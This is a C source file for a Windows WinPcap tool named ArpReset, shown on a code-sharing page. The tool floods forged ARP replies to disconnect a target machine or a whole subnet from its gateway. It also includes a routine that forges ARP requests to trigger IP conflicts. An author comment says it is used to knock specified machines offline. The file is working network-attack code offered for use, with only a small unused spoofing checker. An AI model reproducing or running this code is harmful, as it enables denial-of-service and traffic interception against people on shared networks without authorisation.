📄 arpreset.cpp
字号:
/****************************************************
ArpReset
Made By ZwelL
2005-9-11
http://www.donews.net/zwell
zwell@sohu.com
****************************************************/
#include <stdio.h>
#include "pcap.h"
#include "Packet32.h"
#include "ntddndis.h"
#include <windows.h>
#include <process.h>
#include <iphlpapi.h>
#pragma comment (lib, "packet.lib")
#pragma comment (lib, "wpcap.lib")
#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "iphlpapi.lib")
#define EPT_IP 0x0800 /* type: IP */
#define EPT_ARP 0x0806 /* type: ARP */
#define EPT_RARP 0x8035 /* type: RARP */
#define ARP_HARDWARE 0x0001 /* Dummy type for 802.3 frames */
#define ARP_REQUEST 0x0001 /* ARP request */
#define ARP_REPLY 0x0002 /* ARP reply */
#pragma pack(push, 1)
typedef struct ehhdr
{
unsigned char eh_dst[6]; /* destination ethernet addrress */
unsigned char eh_src[6]; /* source ethernet addresss */
unsigned short eh_type; /* ethernet pachet type */
}EHHDR, *PEHHDR;
typedef struct arphdr
{
unsigned short arp_hrd; /* format of hardware address */
unsigned short arp_pro; /* format of protocol address */
unsigned char arp_hln; /* length of hardware address */
unsigned char arp_pln; /* length of protocol address */
unsigned short arp_op; /* ARP/RARP operation */
unsigned char arp_sha[6]; /* sender hardware address */
unsigned long arp_spa; /* sender protocol address */
unsigned char arp_tha[6]; /* target hardware address */
unsigned long arp_tpa; /* target protocol address */
}ARPHDR, *PARPHDR;
typedef struct chkstruct
{
char gatewaymac[6];
char currentip[30];
}CHKSTRUCT, *PCHKSTRUCT;
typedef struct arpPacket
{
EHHDR ehhdr;
ARPHDR arphdr;
} ARPPACKET, *PARPPACKET;
#pragma pack(pop)
BOOL PrintMacAddr(u_char *pMAC);
//将字符串转换成mac地址的函数
void GetMacAddr(char *s,char *mac)
{
// mac address *must* be in form 001122334455
int i;
char tmp[3];
for (i = 0; i < 6; i++)
{
memset(tmp, 0, 3);
strncpy(tmp, s+i*2, 2);
mac[i] = (unsigned char)strtol(tmp, NULL, 16);
}
}
//
//功能:输入IP取得对应的MAC地址
//
BOOL GetMacFromIp(char* DestIP, char *pMAC)
{
DWORD dwRet;
ULONG ulLen = 6, pulMac[2];
dwRet = SendARP(inet_addr(DestIP), 0, pulMac, &ulLen);
if(dwRet == NO_ERROR)
{
memcpy(pMAC, pulMac, 6);
return TRUE;
}
else return FALSE;
}
//
//功能:检查Arp欺骗的线程
//
DWORD WINAPI CheckArpSnoofThread(LPVOID chk)
{
PCHKSTRUCT tmpchk=(PCHKSTRUCT)chk;
char tmpmac[6];
memset(tmpmac, 0, 6);
GetMacFromIp(tmpchk->currentip, tmpmac);
printf("%s:",tmpchk->currentip);
PrintMacAddr((unsigned char *)tmpmac);
if(strncmp(tmpmac, tmpchk->gatewaymac, 6))
{
printf("%s equal the gataway\n", tmpchk->currentip);
}
return FALSE;
}
//
//功能:检查Arp欺骗
//
BOOL CheckArpSnoof(char* gatewayIP)
{
char subip[30];
char *p;
int i;
CHKSTRUCT tmpchk;
strcpy(subip, gatewayIP);
p = strstr(subip, ".")+1;
p = strstr(p, ".")+1;
p = strstr(p, ".")+1;
subip[p-subip]=0x0;
memset(&tmpchk, 0, sizeof(tmpchk));
GetMacFromIp(gatewayIP, tmpchk.gatewaymac);
for(i=1; i<255; i++)
{
sprintf(tmpchk.currentip, "%s%d", subip, i);
//printf("%s", tmpchk.currentip);
//getchar();
CreateThread(NULL, 0, CheckArpSnoofThread, &tmpchk, 0, 0);
Sleep(200);
}
return FALSE;
}
BOOL PrintMacAddr(u_char *pMAC)
{
int i;
//
// Convert the binary MAC address into human-readable
//
for (i = 0; i < 6; i++)
{
printf("%02x", pMAC[i]);
}
printf("\n");
return TRUE;
}
//
//功能:ARP欺骗,我用来让指定IP的机器断线,
// 其中all指定是否影响整个网段
//
//dstip,dstmac 攻击的IP和MAC
//srcip 实际的IP(网关)
//srcmac 假的Mac
void ArpAttack(pcap_t *tHandle, char *dstip, char *dstmac, char *srcip, char *srcmac, BOOL all)
{
char MacAddr[6];
pcap_t *fp=tHandle;
ARPPACKET ARPPacket;
// the fake mac of multicast
if(all)
{
GetMacAddr("FFFFFFFFFFFF", MacAddr);
memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6);
}
else
memcpy(ARPPacket.ehhdr.eh_dst, dstmac, 6);
//the MAC of sender
//GetMacAddr("FFFFFFFFFFFF", MacAddr);
GetMacAddr("0019DB26345D", MacAddr);
memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6);
ARPPacket.ehhdr.eh_type = htons(EPT_ARP);
//arp header
ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
ARPPacket.arphdr.arp_pro = htons(EPT_IP);
ARPPacket.arphdr.arp_hln = 6;
ARPPacket.arphdr.arp_pln = 4;
ARPPacket.arphdr.arp_op = htons(ARP_REPLY);
GetMacAddr(srcmac, MacAddr);
memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);
ARPPacket.arphdr.arp_spa = inet_addr(srcip);
//GetMacAddr(dstmac, MacAddr);
memcpy(ARPPacket.arphdr.arp_tha , dstmac, 6);
ARPPacket.arphdr.arp_tpa = inet_addr(dstip);
/* Send down the packet */
while(1)
{
while (pcap_sendpacket(fp, // Adapter
(const unsigned char *)&ARPPacket, // buffer with the packet
sizeof(ARPPacket) // size
) != 0)
{
printf("Error sending the packet: %d\n", pcap_geterr(fp));
return;
}
Sleep(200);
}
printf ("Send ok!\n\n");
}
/****************************************************************
IP冲突用的 ;-)
****************************************************************/
void IpAttack(pcap_t *tHandle, char *ip)
{
char MacAddr[6];
pcap_t *fp=tHandle;
ARPPACKET ARPPacket;
// the fake mac of multicast
GetMacAddr("FFFFFFFFFFFE", MacAddr);
memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6);
//the MAC of sender
GetMacAddr("FFFFFFFFFFFE", MacAddr);
memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6);
ARPPacket.ehhdr.eh_type = htons(EPT_ARP);
//arp header
ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
ARPPacket.arphdr.arp_pro = htons(EPT_IP);
ARPPacket.arphdr.arp_hln = 6;
ARPPacket.arphdr.arp_pln = 4;
ARPPacket.arphdr.arp_op = htons(ARP_REQUEST);
GetMacAddr("111111111111", MacAddr);
memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);
ARPPacket.arphdr.arp_spa = inet_addr(ip);
GetMacAddr("222222222222", MacAddr);
memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6);
ARPPacket.arphdr.arp_tpa = inet_addr(ip);
/* Send down the packet */
while(1)
{
while (pcap_sendpacket(fp, // Adapter
(const unsigned char *)&ARPPacket, // buffer with the packet
sizeof(ARPPacket) // size
) != 0)
{
printf("Error sending the packet: %d\n", pcap_geterr(fp));
return;
}
Sleep(100);
}
printf ("Send ok!\n\n");
}
void help()
{
printf("arpreset srcip detip destmac [all]\n");
printf("example:\n\tarpreset.exe 192.168.1.2 192.168.1.1 000aebcd0138 all\n");
exit(0);
}
int main(int argc, char* argv[])
{
pcap_if_t *alldevs;
pcap_if_t *d;
u_char MacAddr[6], savedMacAddr[6];
int inum;
int i=0;
pcap_t *adhandle;
char errbuf[PCAP_ERRBUF_SIZE];
/*CheckArpSnoof("192.168.1.1");*/
if(argc<4)
help();
/* Retrieve the device list */
if(pcap_findalldevs(&alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}
/* Print the list */
printf("============================================\n");
for(d=alldevs; d; d=d->next)
{
printf("%d.", ++i);
if (d->description)
printf(" %s\n", d->description);
else
printf(" No description available\n");
}
if(i==0)
{
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
return -1;
}
printf("============================================\n");
printf("Choice the interface number (1-%d):",i);
scanf("%d", &inum);
if(inum < 1 || inum > i)
{
printf("\nInterface number out of range.\n");
/* Free the device list */
pcap_freealldevs(alldevs);
return -1;
}
/* Jump to the selected adapter */
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* Open the device */
/* Open the adapter */
if ((adhandle= pcap_open_live(d->name, // name of the device
65536, // portion of the packet to capture.
// 65536 grants that the whole packet will be captured on all the MACs.
1, // promiscuous mode (nonzero means promiscuous)
1000, // read timeout
errbuf // error buffer
)) == NULL)
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
/* Free the device list */
pcap_freealldevs(alldevs);
return -1;
}
printf("\nOperation on %s...\n", d->description);
GetMacFromIp(argv[2], (char *)savedMacAddr);
printf("The mac of %s is :", argv[2]);
PrintMacAddr(savedMacAddr);
GetMacFromIp(argv[1], (char *)MacAddr);
//dstip,dstmac 攻击的IP和MAC
//srcip 实际的IP(网关)
//srcmac 假的Mac
//ArpAttack(adhandle, argv[1], (char *)MacAddr, "192.168.30.115", argv[3], (argc==5));
ArpAttack(adhandle, argv[1], (char *)MacAddr, argv[2], argv[3], (argc==5));
printf ("\n\nDetecting end.\n");
// close the adapter and exit
pcap_freealldevs(alldevs);
pcap_close(adhandle);
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -